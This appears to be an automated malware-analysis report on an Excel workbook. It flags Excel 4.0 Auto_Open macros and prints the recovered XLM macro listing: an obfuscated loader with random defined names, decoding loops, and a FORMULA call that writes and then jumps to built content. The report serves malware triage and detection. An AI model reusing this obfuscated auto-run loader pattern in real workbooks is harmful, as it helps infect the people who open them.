MALICIOUS
142
Risk Score
Heuristics 4
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6790 bytes |
SHA-256: 1f67f2aedfccf215647ed7dc3ff91f97d3cc685147a30109f8345c2730de058c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
20 of 39 identifiers look randomly generated (e.g. 'vBJQRiqpghQS') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - EhLgnfwFTXh
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G164
' 0018 26 LABEL : Cell Value, String Constant - BmecMPGHEZp len=0
' 0018 21 LABEL : Cell Value, String Constant - cCILXG len=0
' 0018 25 LABEL : Cell Value, String Constant - eXFNhHYgge len=0
' 0018 27 LABEL : Cell Value, String Constant - HckSuZTygmwu len=0
' 0018 23 LABEL : Cell Value, String Constant - jfkkQuId len=0
' 0018 26 LABEL : Cell Value, String Constant - JJSnPHXwRYu len=0
' 0018 23 LABEL : Cell Value, String Constant - jtghMSuD len=0
' 0018 24 LABEL : Cell Value, String Constant - KGDkcJqlS len=0
' 0018 26 LABEL : Cell Value, String Constant - NLfBjdIYAnQ len=0
' 0018 23 LABEL : Cell Value, String Constant - PnAVKGtP len=0
' 0018 20 LABEL : Cell Value, String Constant - pvDje len=0
' 0018 23 LABEL : Cell Value, String Constant - qCwtPIEI len=0
' 0018 26 LABEL : Cell Value, String Constant - QrCMgFgyvOi len=0
' 0018 20 LABEL : Cell Value, String Constant - RpNBA len=0
' 0018 27 LABEL : Cell Value, String Constant - UjJXfBaDEjBF len=0
' 0018 25 LABEL : Cell Value, String Constant - UMNRezppGc len=0
' 0018 27 LABEL : Cell Value, String Constant - vBJQRiqpghQS len=0
' 0018 21 LABEL : Cell Value, String Constant - VyYbJU len=0
' 0018 24 LABEL : Cell Value, String Constant - xVZfESQvV len=0
' 0018 27 LABEL : Cell Value, String Constant - YAobnbXXyFsR len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' EhLgnfwFTXh,G68,"SET.NAME("jtghMSuD",VALUE("0"))",""
' EhLgnfwFTXh,G72,"SET.NAME("RpNBA",jtghMSuD)",""
' EhLgnfwFTXh,G77,"SET.NAME("VyYbJU",jtghMSuD)",""
' EhLgnfwFTXh,G81,"SET.NAME("xVZfESQvV",COUNTA(PnAVKGtP))",""
' EhLgnfwFTXh,G85,"SET.NAME("vBJQRiqpghQS",COUNTA(jfkkQuId))",""
' EhLgnfwFTXh,G88,[],""
' EhLgnfwFTXh,G93,"SET.NAME("BmecMPGHEZp","")",""
' EhLgnfwFTXh,G98,"RpNBA",""
' EhLgnfwFTXh,G102,"SET.NAME("cCILXG",HLOOKUP("*",PnAVKGtP,RpNBA,FALSE))",""
' EhLgnfwFTXh,G106,"eXFNhHYgge",""
' EhLgnfwFTXh,G110,"SET.NAME("YAobnbXXyFsR",jtghMSuD)",""
' EhLgnfwFTXh,G114,[],""
' EhLgnfwFTXh,G116,"YAobnbXXyFsR",""
' EhLgnfwFTXh,G119,"qCwtPIEI",""
' EhLgnfwFTXh,G122,"KGDkcJqlS",""
' EhLgnfwFTXh,G125,"UMNRezppGc",""
' EhLgnfwFTXh,G127,"SET.NAME("NLfBjdIYAnQ",VALUE(HLOOKUP("*",jfkkQuId,UMNRezppGc,FALSE)))",""
' EhLgnfwFTXh,G132,"QrCMgFgyvOi",""
' EhLgnfwFTXh,G135,"BmecMPGHEZp",""
' EhLgnfwFTXh,G140,"VyYbJU",""
' EhLgnfwFTXh,G145,NEXT(),""
' EhLgnfwFTXh,G148,"HckSuZTygmwu",""
' EhLgnfwFTXh,G150,"SET.NAME("f",INT(T(FORMULA(T(BmecMPGHEZp)&"",""&T(HckSuZTygmwu)))))",""
' EhLgnfwFTXh,G152,"pvDje",""
' EhLgnfwFTXh,G156,NEXT(),""
' EhLgnfwFTXh,G159,RETURN(),""
' EhLgnfwFTXh,G187,"SET.NAME("UjJXfBaDEjBF",G68)",""
' EhLgnfwFTXh,G190,"PnAVKGtP",""
' EhLgnfwFTXh,G194,"SET.NAME("jfkkQuId",R70C13)",""
' EhLgnfwFTXh,G196,"SET.NAME("pvDje",206)",""
' EhLgnfwFTXh,G201,"SET.NAME("JJSnPHXwRYu",7)",""
' EhLgnfwFTXh,G205,UjJXfBaDEjBF(),""
' EhLgnfwFTXh,G206,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.